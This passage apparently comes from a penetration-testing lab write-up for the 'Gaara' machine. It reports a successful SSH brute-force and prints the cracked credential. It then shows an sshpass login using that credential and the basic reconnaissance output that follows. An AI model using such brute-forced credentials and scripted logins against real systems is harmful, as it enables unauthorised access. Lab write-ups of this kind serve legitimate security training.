SSH
Brute-force attack against the target SSH server was successful and a valid system credential has been obtained; gaara:iloveyou2
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/gaara]
└─$ sshpass -p iloveyou2 ssh gaara@$IP
Linux Gaara 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gaara@Gaara:~$ whoami
gaara
gaara@Gaara:~$ hostname
Gaara
gaara@Gaara:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:df:3c brd ff:ff:ff:ff:ff:ff
inet 192.168.239.142/24 brd 192.168.239.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:df3c/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the gaara user via SSH